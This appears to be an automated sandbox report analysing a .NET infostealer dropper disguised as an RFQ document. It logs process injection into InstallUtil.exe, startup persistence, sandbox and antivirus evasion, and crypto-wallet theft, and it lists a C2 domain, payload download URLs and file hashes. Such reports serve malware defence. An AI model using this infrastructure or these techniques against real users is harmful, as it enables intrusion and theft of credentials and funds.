Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 97985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: Count.exe, 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Count.exe, 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1780114140.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4127501251.0000000005180000.00000004.00000020.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2026660048.0000000000893000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76F0A6F0	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6A9008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76F0A6F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 802000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 860000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 862000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7BC008	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Count.exe "C:\Users\user\AppData\Roaming\Count.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002DA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qD7
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q`5
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerh{^q
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002D03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q@7
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qp4
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qP6
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002D53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q08
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002E47000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q\w
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Queries volume information: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Queries volume information: C:\Users\user\AppData\Roaming\Count.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet@\^q com.liberty.jaxx
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: InstallUtil.exe, 00000001.00000002.4119055233.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1793317354.00000000066A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Source: Yara match	File source: 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1460, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	321 Windows Management Instrumentation	111 Scripting	212 Process Injection	1 Masquerading	OS Credential Dumping	621 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	341 Virtualization/Sandbox Evasion	Security Account Manager	341 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	212 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	213 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ-12202431_ACD_Group.pif.exe	29%	Virustotal		Browse
RFQ-12202431_ACD_Group.pif.exe	26%	ReversingLabs	ByteCode-MSIL.Dropper.Generic
RFQ-12202431_ACD_Group.pif.exe	100%	Avira	HEUR/AGEN.1308638
RFQ-12202431_ACD_Group.pif.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Count.exe	100%	Avira	HEUR/AGEN.1308638
C:\Users\user\AppData\Roaming\Count.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Count.exe	26%	ReversingLabs	Win32.Trojan.Sonbokli

Source	Detection	Scanner	Label	Link
https://www.chirreeirl.com	0%	Avira URL Cloud	safe
https://www.chirreeirl.com/wp-panel/uploads/Wlvdlivs.mp3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pureeratee.duckdns.org	193.187.91.218	true	true	unknown
chirreeirl.com	209.58.149.225	true	false	unknown
www.chirreeirl.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.chirreeirl.com/wp-panel/uploads/Wlvdlivs.mp3	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.2038135450.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll	InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354rCannot	InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe	InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe	InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.chirreeirl.com	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.0000000002571000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.0000000002571000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
209.58.149.225	chirreeirl.com	United States		394380	LEASEWEB-USA-DAL-10US	false
193.187.91.218	pureeratee.duckdns.org	Sweden		197595	OBE-EUROPEObenetworkEuropeSE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583542
Start date and time:	2025-01-03 01:49:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ-12202431_ACD_Group.pif.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/4@4/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 489 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 1460 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 7856 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:50:08	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs
19:49:52	API Interceptor	23x Sleep call for process: RFQ-12202431_ACD_Group.pif.exe modified
19:50:14	API Interceptor	9686714x Sleep call for process: InstallUtil.exe modified
19:50:17	API Interceptor	17x Sleep call for process: Count.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.58.149.225	https://contract-kitchensbywoodys16713653.brizy.site/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LEASEWEB-USA-DAL-10US	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	172.241.229.61
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	209.58.145.210
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse	172.241.51.69
	arm7.elf	Get hash	malicious	Unknown	Browse	172.241.27.111
	https://bitfinexinvestment.com/	Get hash	malicious	Unknown	Browse	209.58.153.106
	http://www.web3walletsync.com/	Get hash	malicious	Unknown	Browse	209.58.146.114
	https://click.dn.askhelp247.com/?qs=56daa84a9aeab310141fd7b3abd36125b539fd4f3799231d7ea795f5ca63ee3d16f8d954cbf1ffa46296eb2ff8fe4db6c125eafbd8e358283667a34a51f183ee	Get hash	malicious	Unknown	Browse	172.241.26.5
	https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19	Get hash	malicious	Unknown	Browse	172.241.51.69
	http://nxejt.polluxcastor.top	Get hash	malicious	Unknown	Browse	172.241.51.69
	http://www.msftconnecttest.com/redirect	Get hash	malicious	Unknown	Browse	172.241.51.69
OBE-EUROPEObenetworkEuropeSE	ZppxPm0ASs.exe	Get hash	malicious	Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse	185.157.162.216
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	185.157.162.216
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse	185.157.162.216
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	185.157.162.216
	secondaryTask.vbs	Get hash	malicious	Clipboard Hijacker, MicroClip, Remcos	Browse	185.157.162.126
	Slf.msi	Get hash	malicious	Clipboard Hijacker, MicroClip, Remcos	Browse	185.157.162.126

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ogVinh0jhq.exe	Get hash	malicious	DCRat	Browse	209.58.149.225
	Sylacauga AL License.msg	Get hash	malicious	Unknown	Browse	209.58.149.225
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	209.58.149.225
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	209.58.149.225
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	209.58.149.225
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse	209.58.149.225
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	209.58.149.225
	7FEGBYFBHFBJH32.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	209.58.149.225
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	209.58.149.225

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1183
Entropy (8bit):	5.349889760691853
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhRAE4KzetfE4KnKIE4oKNzKo9E4KhM:MxHKlYHKh3oRAHKzetfHKntHo6lHKG
MD5:	91323CD5C720493F291A5308AF630221
SHA1:	1F94B2F25F7CE942EA6289E8B74295F4689F8A1B
SHA-256:	8EB1993F0CE22F0757AA4E5DB1CF6173C44EBE5CA272CEDFC141961E0A63DE1A
SHA-512:	46858065C5A8BE1BDB19AE7E6A03E6853F65F4F958291733AF36D2C5208072AD5E5EE0C28080FC5D462551445B69BF7D4D5B1E50857FF7E5D7BF36FEABB54E98
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n

C:\Users\user\AppData\Roaming\Count.exe

Download File

Process:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	5.481702907597321
Encrypted:	false
SSDEEP:	384:bTrwOQnF8OrQ96Y8SvNRWrOeY98CfRPdVUvMrELDw+YjzUZ+9q6VDejz8Tu:bfwpn69b8ARW+9jMzZiDFejYa
MD5:	07A7551DA7299874AFD2C3E299ECA83A
SHA1:	250884B7F1C7B152CA82F663D2E91986CEC83DB5
SHA-256:	579054D208BDFDE13C82C6C998E981F0559F69908A1EBC34249C2657A5D1C59D
SHA-512:	4D737E13A950B27356C086751D293731DD5B9400FD1C32F6649391CD6C4B4B8FEC1B7B2DDD90B1F185C3FFB06CACB74821324721FF44CA4534612FDC1899AEF9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg.................Z..........ny... ........@.. ....................................`..................................y..W.......v............................................................................ ............... ..H............text...tY... ...Z.................. ..`.rsrc...v............\..............@..@.reloc...............b..............@..B................Py......H........:..@>............................................................($....(....&.s%...%(&...(.....o'...o(...o)....s%...%(.....o...u/...r...po+...o)....s%...%(.....o...u0...r...p .......o,...o).....{=.....{>...V.($.....}=.....}>.... `..# )UU.Z(?....{=...oC...X )UU.Z(A....{>...oD...X2.r...p(G..."..(G...&...(H...&...(I..."..(...."..(...."..(...."..(...."..(...."..(....f.{.... 